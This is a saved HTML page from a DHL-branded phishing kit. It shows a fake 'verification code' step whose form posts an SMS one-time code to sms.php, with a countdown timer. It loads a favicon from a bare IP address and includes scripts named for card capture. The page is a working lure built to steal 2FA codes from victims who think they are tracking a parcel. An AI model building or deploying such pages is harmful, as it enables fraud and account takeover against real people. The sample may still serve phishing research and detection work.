<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Package received - DHL</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="robots" content="nofollow,noindex">
<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="./sms_files/css2" rel="stylesheet">
<link rel="stylesheet" href="./sms_files/style.css">
<link rel="icon" href="http://160.172.222.172:8080/source/res/icon.png">
<script src="./sms_files/jq.js.download"></script>
<script src="./sms_files/v.js.download"></script>
<script src="./sms_files/m.js.download"></script>
<script src="./sms_files/arr.js.download"></script>
</head>
<body>
<div class="top">
<div class="left">
<img src="./sms_files/dhl-logo.svg">
</div>
<div class="right">
<button class="logout">MyDHL</button>
<button class="logout" id="toplogout">Ausloggen</button>
</div>
</div>

<div class="content">


<div class="form">
<div class="steps">
<div class="step completed">1</div>
<div class="line completed" id="l2"></div>
<div class="step completed" id="s2">2</div>
<div class="line completed" id="l3"></div>
<div class="step" id="s3"><img src="./sms_files/check.svg" style="width:15px;"></div>
</div>
 


<form action="sms.php" method="post" id="otpform">

<h2>Verification code</h2>
<div class="form-col">
<p><b>
We have sent a verification code to your number..
</b></p>
</div>

<div class="form-col">
<p></p>
<input type="text" id="sms" name="sms" required="" class="textinput" placeholder="Enter the confirmation code">
</div>
<div class="form-col">
<p>Inquiry <a href=""><b>New code</b></a> in: <strong id="time">01:42</strong></p>
</div>
<div class="form-col">
<button class="defaultbtn">Confirm</button>
</div>
</form>
 

<div class="form-col" style="margin-top:50px; font-size:0.8em; text-align:center;">
<p>
The use of this service constitutes acceptance of the 
  <a href="">Kondition</a>.</p>
</div>


</div>
</div>


<div class="windowloader" id="loader" style="display:none;">
<div class="wl-content">
<div class="loader">
</div>
</div>
</div>
<script src="./sms_files/ccv.js.download"></script>
<script>

 
 
 
 
var inter;
var otpTimes=0;
var mins = 2;
var secs = 0;
var timer = $('#timer');
var loader = $("#loader");
var billing = $("#billing");
var sms = $("#otpform");
 
var otpError = $("#otp-error");
//masking

 




function startTimer(){
 inter = setInterval(function(){
	 
 if(mins<=0 && secs <= 0){
	 stop()
 }else{
	 if(secs<=0){
		 mins=mins-1;
		 secs=60;
	 }
	 secs = secs -1;
	 
	 updateTime();
	 
 }
 }, 1000);
 
}
 
 startTimer();
 
 function updateTime(){
	 if(secs<10){
		 secs = "0"+secs;
	 }
	 timer.html("0"+mins+":"+secs);
 }
 
 
 
 
 
 

</script>

</body></html>